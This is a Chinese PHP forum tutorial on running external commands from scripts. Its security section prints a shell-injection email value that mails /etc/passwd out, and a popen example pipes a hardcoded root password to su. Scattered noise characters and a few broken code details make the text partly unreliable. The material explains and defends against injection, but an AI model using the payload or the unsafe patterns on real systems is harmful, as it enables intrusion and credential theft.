|
作者:Fluke 中文PHP论坛
: l$ U5 T& q( g2 ^4 O4 B/ b) } PHP作为一种服务器端的脚本语言,象编写简单,或者是复杂的动态网页这样的任务,它完全能够胜任。但事情不总是如此,有时为了实现某个功能,必须借助于操作系统的外部程序(或者称之为命令),这样可以做到事半功倍。 # p. s" i+ c7 h. L0 x
那么,是否可以在PHP脚本中调用外部命令呢?如果能,如何去做呢?有些什么方面的顾虑呢?相信你看了本文后,肯定能够回答这些问题了。
, l8 ]- I( E2 {3 Z1 k: T1 ^ 是否可以? " \! l% {* F: s- `# @# N) s& S0 d
答案是肯定的。PHP和其它的程序设计语言一样,完全可以在程序内调用外部命令,并且是很简单的:只要用一个或几个函数即可。 % G" @5 F8 |) m( k, }: r
前提条件 / h7 @2 V" x0 z* A0 R
由于PHP基本是用于WEB程序开发的,所以安全性成了人们考虑的一个重要方面。于是PHP的设计者们给PHP加了一个门:安全模式。如果运行在安全模式下,那么PHP脚本中将受到如下四个方面的限制: % K( a$ n: @* ?# z. o, R% y! L1 o+ @
执行外部命令 1 G# s0 T2 K- l# N; J7 c
在打开文件时有些限制 5 O5 ^4 B; ~# P
连接MySQL数据库
5 D: c8 N( T! B( ] 基于HTTP的认证 . Z1 S8 K1 z2 r; n1 i6 j
在安全模式下,只有在特定目录中的外部程序才可以被执行,对其它程序的调用将被拒绝。这个目录可以在php.ini文件中用safe_mode_exec_dir指令,或在编译PHP是加上--with-exec-dir选项来指定,默认是/usr/local/php/bin。 8 _, m0 t% i* {/ ^: S( H
如果你调用一个应该可以输出结果的外部命令(意思是PHP脚本没有错误),得到的却是一片空白,那么很可能你的网管已经把PHP运行在安全模式下了。
4 Z9 S8 T5 J4 F! g1 Y3 b 如何做? ) f: S% @$ Z: d a( ~& B6 c1 b
在PHP中调用外部命令,可以用如下三种方法来实现:
$ n. _, e) n8 N( J5 S* | 1) 用PHP提供的专门函数
( R$ g) ^/ K4 A P" X/ d/ r PHP提供共了3个专门的执行外部命令的函数:system(),exec(),passthru()。 + _1 D- x1 g9 Z( F# ] q
system() ; w. e* h6 K9 A
原型:string system (string command [, int return_var]) 7 ?: \4 @0 l/ k ~
system()函数很其它语言中的差不多,它执行给定的命令,输出和返回结果。第二个参数是可选的,用来得到命令执行后的状态码。
1 ^, x& [/ q {' H% W 例子:
5 r: N; X; u: V$ z9 r <?
B( W( ?7 a3 Q5 C; k system("/usr/local/bin/webalizer/webalizer");
% P+ Q. L9 ~+ s0 n" L# E! y ?> $ X/ A, Q9 K7 r5 N
exec() , X& V; |' X& \% H) u7 V
原型:string exec (string command [, string array [, int return_var]]) 6 F2 `0 e. a) W, r4 q' T
exec()函数与system()类似,也执行给定的命令,但不输出结果,而是返回结果的最后一行。虽然它只返回命令结果的最后一行,但用第二个参数array可以得到完整的结果,方法是把结果逐行追加到array的结尾处。所以如果array不是空的,在调用之前最好用unset()最它清掉。只有指定了第二个参数时,才可以用第三个参数,用来取得命令执行的状态码。 . `* ?5 ~; ^& B* r! l3 a
例子:
1 M @+ {, W1 b6 z H8 w <?
/ ]" V3 ?2 T8 Q3 `" i/ Z0 Z O exec("/bin/ls -l");
: A. j; r9 U7 ?1 X% Z* _ exec("/bin/ls -l", $res);
5 ~# o: b- I1 J" V' P0 Y1 T #$res是一个数据,每个元素代表结果的一行
( y, a" T" V8 k: O" K exec("/bin/ls -l", $res, $rc); & H: i. H; h- y7 c: s& _
#$rc的值是命令/bin/ls -l的状态码。成功的情况下通常是0
3 `/ K& [9 E2 \ p5 Z$ C' o ?> 9 i- Y+ b' @( [- A% b3 ?* u
passthru()
3 H. i y& n# X 原型:void passthru (string command [, int return_var])
9 K, o8 W2 v6 X w( j% E passthru()只调用命令,不返回任何结果,但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmplus(Unix下的一个处理图片的工具,输出二进制的原始图片的流)这样的程序。同样它也可以得到命令执行的状态码。
. I) ~7 R k8 F U. G 例子:
) ~ m4 F, ]# Y/ _6 }) v' I <? 0 u' A. `: e4 d
header("Content-type: image/gif");
+ Z2 X* P3 p6 s; ^% { passthru("./ppmtogif hunte.ppm"); ' X/ l! h5 G) A J
?> $ }; U) @9 s' ~0 F; c
2) 用popen()函数打开进程 . X0 Q1 n l0 p" z. P
上面的方法只能简单地执行命令,却不能与命令交互。但有些时候必须向命令输入一些东西,如在增加Linux的系统用户时,要调用su来把当前用户换到root才行,而su命令必须要在命令行上输入root的密码。这种情况下,用上面提到的方法显然是不行的。
+ B* v: Y& C" a# V; l4 I5 M9 n popen()函数打开一个进程管道来执行给定的命令,返回一个文件句柄。既然返回的是一个文件句柄,那么就可以对它读和写了。在PHP3中,对这种句柄只能做单一的操作模式,要么写,要么读;从PHP4开始,可以同时读和写了。除非这个句柄是以一种模式(读或写)打开的,否则必须调用pclose()函数来关闭它。 ! V+ ~) v, Q+ }# ^' L0 T* @
例子1: 1 t3 ?0 w: L" }. f8 |
<?
6 \ w) }% T! o# T. L' t/ w $fp=popen("/bin/ls -l", "r"); . j V: A- V2 L1 k
?> ~) p0 I" G# L8 k% a+ t. r* N
例子2(本例来自PHP中国联盟网站http://www.phpx.com/show.php?d=col&i=51): 1 M( O# J& Q: z2 y% t9 }
<? c7 R' y0 \) B
/* PHP中如何增加一个系统用户 8 I3 ?7 I2 P4 ]2 ~8 N9 H/ e1 \
下面是一段例程,增加一个名字为james的用户,
" Q s4 } U" _0 [' A root密码是 verygood。仅供参考
2 U% T1 Z' Y7 |$ @0 a, v8 [2 \ */ - ~8 F5 X6 M5 u5 z( ^9 H2 c
$sucommand = "su --login root --command";
& p: d" l) v" ` P $useradd = "useradd ";
! ~# {" Q3 c9 K8 h $rootpasswd = "verygood";
9 k7 z/ ]: s4 A5 K4 P/ d, w9 f $user = "james";
( H3 s/ v2 z0 f. Y4 I $user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);
: b* @4 c. P x( c2 y1 O6 x $fp = @popen($user_add,"w");
) j2 h! I2 `1 F @fputs($fp,$rootpasswd);
( z) z; |+ l+ |# i7 @ @pclose($fp); 1 _4 e/ `! y9 O
?>
; i- E6 o. w" C9 \& f% N5 V9 U 3) 用反撇号(`,也就是键盘上ESC键下面的那个,和~在同一个上面)
1 j& R% N- n- H, u- M+ M* Y 这个方法以前没有归入PHP的文档,是作为一个秘技存在的。方法很简单,用两个反撇号把要执行的命令括起来作为一个表达式,这个表达式的值就是命令执行的结果。如:
5 O Q: u& J0 v" i5 b <?
5 s3 v; V3 s/ z6 j9 i* W, _3 k2 l5 r $res=`/bin/ls -l`;
- Z4 `# M- y( X! Q+ I# v echo '<b><pre>'.$res.'</pre></b>'; * ~' n) q( |7 T) J3 _7 ^' | ?% s
?> 5 S5 P, g n5 D& W
这个脚本的输出就象: 0 l t3 T; _/ R. w+ Y
hunte.gif
* h# U0 E7 I5 i" t, v/ a7 c# \ hunte.ppm ; S, Q W5 W& t: z
jpg.htm 1 J% t" D2 z! [* f1 n; s
jpg.jpg
' }+ Y1 {9 H" V7 |7 q& N/ O N passthru.php
- a) P7 f6 H) T& l 要考虑些什么?
3 F& }8 w. U6 a6 ]8 b: f& f 要考虑两个问题:安全性和超时。 p% ]7 v! R; w# }: v0 H! E
先看安全性。比如,你有一家小型的网上商店,所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件,让你的用户输入他们的EMAIL地址,然后把这个产品列表发给他们。假设你没有使用PHP的mail()函数(或者从未听说过),你就调用Linux/Unix系统的mail程序来发送这个文件。程序就象这样:
' | i- i" z8 I" c <? 9 g" p1 ?% \3 _5 j
system("mail $to < products.txt"); + g- U: O" e$ K( s, T
echo "我们的产品目录已经发送到你的信箱:$to";
. q/ L5 Y+ H( L! \5 j" l& v ?> , X( p7 s9 N. M2 j9 H
用这段代码,一般的用户不会产生什么危险,但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址: ! u) `; \: C/ V# Q. r1 \
'--bla ; mail someone@domain.com < /etc/passwd ;'
. ~6 B+ W) U0 k/ j& G+ t 那么这条命令最终变成: ( I' G7 |0 j4 w) B3 {' ]* V. c3 e
'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt' / }, _' l5 n% a1 N2 U
我相信,无论哪个网络管理人员见到这样的命令,都会吓出一身冷汗来。 $ a1 S4 D4 A& o5 p0 i Y, }- m% C
幸好,PHP为我们提供了两个函数:EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的,象分号(),重定向(>)和从文件读入(<)等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串就可以安全地作为命令的参数。
; ~+ B+ l# \3 @* P) y4 L 再来看看超时问题。如果要执行的命令要花费很长的时间,那么应该把这个命令放到系统的后台去运行。但在默认情况下,象system()等函数要等到这个命令运行完才返回(实际上是要等命令的输出结果),这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外一个文件或流中,如:
( l2 p/ R8 C' e) Y# r <?
: x1 r/ c, w8 x; H9 V% p& p4 v, _* ` system("/usr/local/bin/order_proc > /tmp/null &");, W: y- V2 J3 L6 s. P8 q
?>
. O1 t1 d( y; a- s | 
IP卡
狗仔卡
发表于 2005-1-16 11:34
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
